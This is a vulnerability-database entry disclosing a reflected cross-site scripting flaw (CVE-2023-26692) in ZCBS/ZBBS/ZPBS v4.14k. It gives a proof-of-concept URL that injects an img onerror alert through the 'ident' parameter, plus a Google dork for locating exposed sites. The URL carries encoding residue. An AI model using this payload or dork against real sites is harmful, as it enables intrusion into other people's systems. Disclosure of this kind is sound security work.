ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)

Author: Abdulaziz Saad
type: webapps
platform: cgi
port: 
date_added: 2023-04-08  
date_updated: 2023-04-08  
verified: 0  
codes: CVE-2023-26692  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 51347.txt  
# Exploit Title: ZCBS/ZBBS/ZPBS v4.14k - Reflected Cross-Site Scripting (XSS)
# Date: 2023-03-30
# CVE: CVE-2023-26692
# Exploit Author: Abdulaziz Saad (@b4zb0z)
# Vendor Homepage: https://www.zcbs.nl
# Version: 4.14k
# Tested on: LAMP, Ubuntu
# Google Dork: inurl:objecten.pl?ident=3D

---

[#] Vulnerability :

`$_GET['ident']`


[#] Exploitation :

`https://localhost/cgi-bin/objecten.pl?ident=3D%3Cimg%20src=3Dx%20onerror=
=3Dalert(%22XSS%22)%3E`